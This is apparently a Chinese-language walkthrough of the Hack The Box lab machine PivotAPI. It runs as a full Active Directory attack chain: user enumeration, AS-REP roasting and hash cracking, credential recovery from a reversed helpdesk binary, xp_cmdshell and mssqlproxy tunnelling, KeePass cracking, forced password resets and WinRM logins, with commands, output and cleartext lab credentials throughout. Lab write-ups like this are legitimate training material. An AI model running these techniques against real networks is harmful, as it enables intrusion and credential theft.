PivotAPI
信息收集
目标IP
10.129.236.84
使用fscan初步探测端口信息
export ip=10.129.236.84
fscan -h $ip -p 1-65535
端口信息
10.129.236.84:445 open
10.129.236.84:464 open
10.129.236.84:593 open
10.129.236.84:22 open
10.129.236.84:21 open
10.129.236.84:135 open
10.129.236.84:389 open
10.129.236.84:88 open
10.129.236.84:53 open
10.129.236.84:139 open
10.129.236.84:636 open
10.129.236.84:1433 open
10.129.236.84:3269 open
10.129.236.84:3268 open
10.129.236.84:9389 open
信息探测
[*] NetInfo:
[*]10.129.236.84
[->]PivotAPI
[->]10.129.236.84
[+] ftp://10.129.236.84:21:anonymous
[->]10.1.1.414.6453.pdf
[->]28475-linux-stack-based-buffer-overflows.pdf
[->]BHUSA09-McDonald-WindowsHeap-PAPER.pdf
[->]ExploitingSoftware-Ch07.pdf
[->]notes1.pdf
[->]notes2.pdf
存在FTP匿名访问,wget -m ftp://anonymous@$ip:21镜像下载所有文件
查看所有pdf文件的exif信息
exiftool *.pdf
以10.1.1.414.6453.pdf为例
======== 10.1.1.414.6453.pdf
ExifTool Version Number : 12.65
File Name : 10.1.1.414.6453.pdf
Directory : .
File Size : 103 kB
File Modification Date/Time : 2021:02:19 14:06:00-05:00
File Access Date/Time : 2024:01:07 06:29:24-05:00
File Inode Change Date/Time : 2024:01:07 06:27:13-05:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.2
Linearized : No
Page Count : 23
Creator : Microsoft Word
Create Date : 10. February 2000 11:41
Title : Takanen
Author : Unknown
Producer : Acrobat PDFWriter 3.02 for Windows
Subject :
列出可能具有关键信息的字段
Publisher
Author
Creator
提取这些信息
分别保存到对应的文件
获取立足点
对于目前暴露的信息不难推断出,LicorDeBellota.htb 是该目标的一个域,可以尝试利用kerbrute枚举域用户
用户名枚举
原理
Kerbrute是⼀个利用Kerberos协议来进行用户名的工具。
Kerberos作为网络认证协议,它允许在网络上进行节点之间的安全身份验证。在Kerberos的环境中,用户或服务的身份验证是基于密钥,而不是密码。当一个不存在的用户名进行认证时,Kerberos会返回特定的错误KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN用于表示未知的用户名,从而判断用户是否存在
利用
kerbrute userenum --domain LicorDeBellota.htb --dc $ip /usr/share/seclists/Usernames/xato-net-10-mill│└─$
ion-usernames.txt -t 500
2024/01/07 06:59:26 > [+] VALID USERNAME: jari@LicorDeBellota.htb │
2024/01/07 07:06:18 > [+] VALID USERNAME: administrador@LicorDeBellota.htb │
2024/01/07 07:22:29 > [+] VALID USERNAME: sshd@LicorDeBellota.htb
根据以上信息,我们可以得到一个可能的用户列表,保存到usernames
saif
byrongronseth
alex
Kaorz
jari
administrador
sshd
AS-REP Roasting
目前拿到的信息时一组用户名,尝试AS-REP Roasting攻击
原理
这是一种针对kerberos协议的攻击技术,不需要认证就可以获取到用户的密码hash值。问题出现在身份预认证是kerberos认证的第一步,通常是由KDC认证服务器来管理,目的是为了防止暴力破解攻击。
问题就是出现在如果用户开启了不使用Kerberos预认证(Do not require Kerberos preauthentication),攻击者可以通过Kerberos AS-REP请求,获取到经过用户的hash加密过TGT票据,然后就可以离线破解这个凭证了,但是该属性是默认不开启的。
利用
- 获取
hash
GetNPUUsers.py获取用户hash
impacket-GetNPUsers -no-pass -dc-ip $ip LicorDeBellota.htb/ -usersfile usernames
$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:94e9bff1534866b4b9ba642743f786d4$d329045548922264696a7ae8b964f903022a52463622a51efa5dd6343c039007af13f1c24950039936cd1a6a563af9622263545d12d03f5e3858264bf9d2a8bfbacd3a95d6eeccc86e2354ea88cfa68ecef792147e1b35f3b99ead60ef251a4b0925f6e298f3033c5e083d14c925e6cd87d6633be6a3717a3a8bae066868bd2a649e430f84e1ba29c2c8f467c6e40378b649fd2b3a62174f88cbd9667ec548df8f27605147d354e9be3afd0a0e1abf3d06b2e48d859eb64259d2f7221b0c65c00f7283f42788fb676da45999e92c1d64038db93da4505156772ee75f6b0e3e2404c31fa4c7af3be094818fa712f7b5e1f1bc22f17a9e25ed
获得Kaorz用户的hash
- 破解
TGT
john配合rockyou字典爆破hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Roper4155 ($krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB)
BloodHound 域内信息收集
凭据Kaorz:Roper4155
bloodhound-python -c ALL -u kaorz -p Roper4155 -d licordebellota.htb -dc licordebellota.htb -ns $ip --zip
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: licordebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 28 users
INFO: Found 58 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
登⼊BloodHound主程序,导入数据,查看域内信息
登陆服务
凭据Kaorz:Roper4155
尝试登录开放的各种服务
使用crackmapexec获取smb服务的权限
crackmapexec smb $ip -u Kaorz -p Roper4155 --shares
SMB 10.129.236.84 445 PIVOTAPI [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB 10.129.236.84 445 PIVOTAPI [+] LicorDeBellota.htb\Kaorz:Roper4155
SMB 10.129.236.84 445 PIVOTAPI [+] Enumerated shares
SMB 10.129.236.84 445 PIVOTAPI Share Permissions Remark
SMB 10.129.236.84 445 PIVOTAPI ----- ----------- ------
SMB 10.129.236.84 445 PIVOTAPI ADMIN$ Admin remota
SMB 10.129.236.84 445 PIVOTAPI C$ Recurso predeterminado
SMB 10.129.236.84 445 PIVOTAPI IPC$ READ IPC remota
SMB 10.129.236.84 445 PIVOTAPI NETLOGON READ Recurso compartido del servidor de inicio de sesión
SMB 10.129.236.84 445 PIVOTAPI SYSVOL READ Recurso compartido del servidor de inicio de sesión
smbclient连接到共享NetLogOn,下载HelpDesk中的所有文件
smbclient -U LicorDebellota.htb/kaorz //$ip/netlogon
邮件内容读取
msgconvert *.msg
将msg文件转换为ASCII可读文件,分析文件内容得知,Restart-OracleService.exe是一个用来登录Oracle数据库并重启服务的程序,自然可以想到里面可能存在数据库登陆的凭据
Restart-OracleService.exe 逆向分析
file Restart-OracleService.exe
查看文件相关信息
Restart-OracleService.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections
可以看出是一个Windows x64可执行的控制台程序
strings Restart-OracleService.exe
查看字符串信息,没有看到数据库凭据
IDA查找字符串也没有收获,没有符号表,也找不到可利用的信息
使用ProcessMonitor监视这个程序的行为,尝试查询可分析的信息
配置好Filter
运行程序
查看进程行为
可以看到,创建了C:\Users\V3g3t4ble\AppData\Local\Temp\B19C.tmp\B19D.tmp\B19E.bat文件在一系列操作后又删除
写一个简单的文件检测程序尝试捕获这个文件
package main
import (
"fmt"
"github.com/fsnotify/fsnotify"
"log"
"os"
)
func main() {
watcher, err := fsnotify.NewWatcher()
if err != nil {
log.Fatal(err)
}
defer func(watcher *fsnotify.Watcher) {
err := watcher.Close()
if err != nil {
}
}(watcher)
done := make(chan bool)
go func() {
for {
event, _ := <-watcher.Events
if event.Op&fsnotify.Write == fsnotify.Write {
file, err := os.ReadFile(event.Name)
if err != nil {
fmt.Println(err.Error())
}
fmt.Println("捕获文件",event.Name)
save, err := os.OpenFile("D:\\file.txt", os.O_APPEND|os.O_CREATE, 0644)
defer func() {
err := save.Close()
if err != nil {
return
}
}()
if err != nil {
fmt.Println(err.Error())
}
_, err = save.Write(file)
if err != nil {
return
}
} else if event.Op&fsnotify.Create == fsnotify.Create {
fileInfo, _ := os.Stat(event.Name)
if fileInfo.Mode().IsDir() {
_ = watcher.Add(event.Name)
fmt.Println("创建文件夹:", event.Name)
continue
} else if fileInfo.Mode().IsRegular() {
fmt.Println("创建文件:", event.Name)
}
}
}
}()
err = watcher.Add("C:\\Users\\V3g3t4ble\\AppData\\Local\\Temp")
if err != nil {
log.Fatal(err)
}
<-done
}
获取到bat内容
@shift /0
@echo off
if %username% == cybervaca goto correcto
if %username% == frankytech goto correcto
if %username% == ev4si0n goto correcto
goto error
:correcto
[内容太长,省略]
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt
echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1
del c:\programdata\monta.ps1
del c:\programdata\oracle.txt
c:\programdata\restart-service.exe
del c:\programdata\restart-service.exe
:error
不难看出,经过检测用户名后,将base64内容写入到oracle.txt然后转换为restart-service.exe,执行然后删除所有相关的文件,获取到restart-service.exe进行进一步分析,修改脚本
@shift /0
@echo off
[内容太长,省略]
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> E:\\Code\oracle.txt
echo $salida = $null; $fichero = (Get-Content E:\\Code\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("E:\\Code\restart-service.exe", [System.Convert]::FromBase64String($salida)) > E:\\Code\monta.ps1
powershell.exe -exec bypass -file E:\\Code\monta.ps1
获取到restart-service.exe
API Monitor检测行为获得Oracle凭据
# Type Name Pre-Call Value Post-Call Value
WCHAR "svc_oracle" "svc_oracle"
# Type Name Pre-Call Value Post-Call Value
WCHAR "#oracle_s3rV1c3!2010" "#oracle_s3rV1c3!2010"
Mssql 权限
查看域内发现竟然没有Oracle,根据邮件信息,在2020年把Oracle换成了Mssql 尝试使用凭据svc_mssql:#mssql_s3rV1c3!2020登录Mssql
impacket-mssqlclient "LicorDeBellota.htb/svc_mssql:#mssql_s3rV1c3\!2020@$ip"
登陆失败,尝试使用sa登录
获得数据库shell
尝试使用xp_cmdshell执行移动命令
SQL (sa dbo@master)> enable_xp_cmdshell;
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'show advanced options' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'xp_cmdshell' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
SQL (sa dbo@master)> xp_cmdshell whoami
output
---------------------------
nt service\mssql$sqlexpress
NULL
由于之前的邮件中说过,各种协议的隧道都是被禁止的,尝试使用MssqlProxy获取立足点
python3 mssqlproxy/mssqlclient.py "LicorDeBellota.htb/sa:#mssql_s3rV1c3\!2020@$ip"
> enable_ole
> upload reciclador.dll C:\windows\temp\reciclador.dll
python3 mssqlclient.py "LicorDeBellota.htb/sa:#mssql_s3rV1c3\!2020@$ip" -install -clr assembly.dll
python3 mssqlclient.py "LicorDeBellota.htb/sa:#mssql_s3rV1c3\!2020@$ip" -start -reciclador 'C:\Windows\Temp\reciclador.dll'
ProxyChains连接代理
探测Winrm服务
proxychains -q nmap -Pn -p 5985 127.0.0.1
5985/tcp open wsman
获取shell
proxychains -q evil-winrm -i 127.0.0.1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
横向移动
获取SSH 凭据
下载桌面的credentials.kdbx
破解密码
keepass2john credentials.kdbx > credentials
john credentials --wordlist=/usr/share/rockyou.txt
mahalkita (credentials)
打开数据库
kpcli -kdb credentials.kdbx
发现一个SSH凭据
show -f Database/Windows/SSH
得到凭据3v4Si0N:Gu4nCh3C4NaRi0N!23,根据之前的端口扫描结果,22端口开放,连接SSH,拿到user flag
C盘下存在一个Developers目录
当前用户无法访问
net group /domain|findstr Developers
发现有一个Developers组
net group Developers /domain
组内成员为
jari
superfime
BloodHound查看路径
获取 dr.zaiuss权限
修改密码,winrm登录
net user 'dr.zaiuss' 'V3g3t4ble'
proxychains -q evil-winrm -i 127.0.0.1 -u 'dr.zaiuss' -p 'V3g3t4ble'
获取 Superfume权限
net user 'superfume' 'V3g3t4ble'
proxychains -q evil-winrm -i 127.0.0.1 -u 'superfume' -p 'V3g3t4ble'
获取 Jari权限
获得restart-mssql.exe,program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Threading;
namespace restart_oracle
{
class Program
{
public class RC4
{
public static byte[] Encrypt(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
public static byte[] Decrypt(byte[] pwd, byte[] data)
{
return Encrypt(pwd, data);
}
public static byte[] StringToByteArray(String hex)
{
int NumberChars = hex.Length;
byte[] bytes = new byte[NumberChars / 2];
for (int i = 0; i < NumberChars; i += 2)
bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
return bytes;
}
}
static void Main()
{
string banner = @"
____ __ __ __
/ __ \___ _____/ /_____ ______/ /_ ____ ___ ______________ _/ /
/ /_/ / _ \/ ___/ __/ __ `/ ___/ __/ / __ `__ \/ ___/ ___/ __ `/ /
/ _, _/ __(__ ) /_/ /_/ / / / /_ / / / / / (__ |__ ) /_/ / /
/_/ |_|\___/____/\__/\__,_/_/ \__/ /_/ /_/ /_/____/____/\__, /_/
/_/
by @HelpDesk 2020
";
byte[] key = Encoding.ASCII.GetBytes("");
byte[] password_cipher = { };
byte[] resultado = RC4.Decrypt(key, password_cipher);
Console.WriteLine(banner);
Thread.Sleep(5000);
System.Diagnostics.Process psi = new System.Diagnostics.Process();
System.Security.SecureString ssPwd = new System.Security.SecureString();
psi.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
psi.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
psi.StartInfo.RedirectStandardOutput = true;
psi.StartInfo.UseShellExecute = false;
psi.StartInfo.UserName = "Jari";
string password = "";
for (int x = 0; x < password.Length; x++)
{
ssPwd.AppendChar(password[x]);
}
password = "";
psi.StartInfo.Password = ssPwd;
psi.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
psi.Start();
}
}
}
使用dnSpy分析程序
从内存中Dump出一个凭据Cos@Chung@!RPG,根据密码获取的位置猜测Jari:Cos@Chung@!RPG winrm连接
proxychains -q evil-winrm -i 127.0.0.1 -u 'jari' -p 'Cos@Chung@!RPG'
